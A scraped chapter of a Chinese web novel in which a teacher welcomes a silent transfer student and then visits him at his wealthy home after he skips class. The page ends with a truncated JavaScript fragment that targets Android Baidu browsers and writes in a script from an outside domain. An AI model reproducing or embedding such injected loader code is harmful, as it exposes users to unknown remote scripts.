逃脱 分卷阅读10

    我们班新转学来的同学――蓝蕻”然后她转头轻声对蓝蕻说,“向大家介绍一下自己吧”

    蓝蕻只看了她一眼,就一言不发地向教室后的空座位走去。蓝静仪愣了愣,嘴巴张了张,却没叫出口。

    难道他真的不会说话?她有点怪自己太过鲁莽,万一是真的,那自己的话岂不是太伤他的自尊了。

    “他好酷哦”

    “真的好帅呀”

    下边的女生在窃窃私语。蓝静仪尴尬地扯扯嘴角,“我们……我们欢迎他加入我们班好不好?”她带头拍起掌。

    “哗”下边掌声四起,尤其是女孩子们格外积极。

    蓝蕻依旧面无表情,但淡漠的眸子在蓝静仪带头鼓掌的时候有些微微的闪动。

    自从来到高一三班,蓝蕻一直很安静,学习成绩也非常优异。表面上看他应该是那种非常受老师喜爱的好学生,但蓝静仪不这么想。越是这样的学生她越觉得很难管理,因为他拒绝与任何人沟通,他的周身仿佛罩着一个冰冷的隔离罩,将自己与周围隔离,只用淡漠的眼睛看着罩子外面的其他人。

    蓝静仪还从来没听到过他说话,她更认定了他是个哑孩子,而不会说话恰恰防碍了他与其他人的交流,久而久之形成了他孤僻乖戾的个性。因此,她心里对这个花一样的少年更多了一层关爱。

    她开始朗读课文,一边读一边走下讲台,她习惯在读课文时在过道中走动,以便每个同学能听得更清楚。

    忽然一阵无力感袭来,她双腿发软,眼前一黑,一双大手扶住了她的肩膀。“老师,你没事吧?”于邶关切的脸慢慢在她眼前放大。

    蓝静仪扶着额头,笑笑,“没事,老师没事”她示意于邶坐下,折回身往回走。

    “老师,你休息一下吧”肖英有些担心地说,蓝静仪摇摇头,“老师真的没事了,你们不要担心,现在我找同学念一下吧”

    下课了,蓝静仪回到办公室收拾东西。

    年级课长韩风将一杯水端给她,坐在桌前,“这么急要去哪儿?”

    蓝静仪头也不抬,“谢谢,我不渴,我要去家访,我们班有位同学已经三天没来了”

    “先打个电话问一下吧,你的病刚好,还是不要这么劳累,瞧,虽然你擦了胭脂,但面色还是很差”

    蓝静仪脸红了一下。韩风轻声说,“不过,今天你真的很漂亮,从认识你开始,第一次见你这么打扮”

    “学长好肉麻”蓝静仪终于抬起头,羞涩地一笑。韩风是她大学时的学长,一直很照顾她。她来到这个学校,一半原因也是因为他的邀请。

    东西收拾好了,她拎起皮包,见韩风仍坐在桌前看着她,“我查过了,蓝蕻的资料里并没有留下联系电话,只有家庭住址,我一定要去一趟了,不然心里很不安”说完,她往门外走。

    韩风伸手拉住她一只胳膊,“你的腿怎么了?”

    停了一会儿,蓝静仪一笑,“只是生病的后遗症而已,病好了腿也是会有一点发软,学长放心啦,不碍事的”

    “我和你一起去吧”韩风去拿外套。

    “不要”蓝静仪娇嗔,“别的老师会说课长偏心的”说完她已经走出了办公室。

    蓝蕻住在一幢位于山顶的别墅里。蓝静仪跟在管家陈伯身后问道,“陈伯,蓝蕻是不是生病了?”

    陈伯一脸为难的神情。蓝静仪会意,“他三天没去上课,他的父母知不知道?”

    陈伯摇头。蓝静仪说道,“父母不在吗,您能不能联系到他们,我想向他们了解一下蓝蕻的情况”

    陈伯叹了一口气,“蓝老师,少爷的妈妈远在美国,只有我陪着少爷在国内读书,少爷最近两天情绪不好,我也不敢问,请蓝老师多费心了”说着,陈伯已经领蓝静仪走进一个大厅,陈伯轻鞠一躬,悄悄退了出去。

    蓝静仪发现,这个大厅居然是一间豪华的室内游泳馆。泳池里,只有一个少年在里面游动。他修长的身体在碧绿的水里翻转,姿势非常优美。

    蓝静仪站在泳池边,嘴角带着微笑看着他。

    一忽儿,泳池里的男孩不见了,蓝静仪正在发愣,脚边“扑”的一声,男孩从水里钻出来,水花喷溅在她的小鹿皮鞋上,她连忙向后躲。男孩已经从水里走上来,擦过她的身子,坐在旁边的凉椅上。

    他只穿了平脚的红色泳裤,头发湿漉漉垂在额前,皮肤很白,身材也格外健美。他拿起桌上冰蓝色的鸡尾酒轻啜,狭长的星眸轻眯,将头搁在椅背上,似乎并未发现厅里多了一个人。

    蓝静仪将视线撇开,虽然他是她的学生,但她并不习惯看到男生赤裸着上身,而且泳裤很紧身,令男性像徵很明显。她拿起椅子上干净的大毛巾递给他,“披上吧,不然很容易感冒的,还有把头发也擦干了,不然……”她住了嘴,因为一道目光正扫向她,冷淡的定在她的脸上。

    恰好,陈伯走过来,“蓝老师,请喝橙汁”,蓝静仪忙站起身道谢,陈伯点点头,又退出去了。

    蓝静仪转着杯子,看到浴巾已经盖在他身上,只是他的头发仍湿漉漉地滴着水珠。

    “蓝蕻,为什么没去上课?”她小心翼翼地问。其实她并不指望他会回答她,她只是希望他能够给她一个眼神,语言并不是万能的,有时候一个眼神就够了。

    只是蓝蕻已经闭起眼,身后的椅背自动向后压,让他的身子躺成很舒适的角度。他手里仍握着酒杯,冰蓝的液体非常的赏心悦目。

    他似乎并未听见她说的话,更确切地说,他根本不想理她。

    那冰蓝看在蓝静仪眼里很是刺目。这么小小年纪就学会喝酒,如果是别的学生,她早已经开始责备了,但那种策略不能用在蓝蕻身上。

    “你……睡了吗?”她轻声问,目光停在他的黑睫毛上。

    那睫毛颤动了一下,向上一挑,露出淡漠的黑眸,“老师怎么来了?”眼睛重又闭上了。

    蓝静仪一跳,怔怔地看住他。原来他并不是哑子,原来他会说话。心里并没有愤怒,而是异常的喜悦。

    这么优秀的孩子,如果是哑子会很可惜,“蓝蕻,为什么没去上课,有什么困难,可以告诉老师吗?”她耐心地继续问。

    “老师怎么知道我没去上课?”

    “啊?”蓝静仪一愣,没想到他会这么问,“是同学们跟我说的”

    “他们说了老师就信,老师不是也没去上课吗?”

    “……”蓝静仪无言以对。她尴尬地看了蓝蕻一眼,好在蓝蕻仍然闭着眼睛,没看到她一脸的尴尬表情。

    她早就知道,像蓝蕻这样的“好”学生最难对付。

    “怎么不说话了?”蓝蕻扫了蓝静仪一眼。

    “是老师不好,没有提前跟你们打招呼,是我身体有点不舒服

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('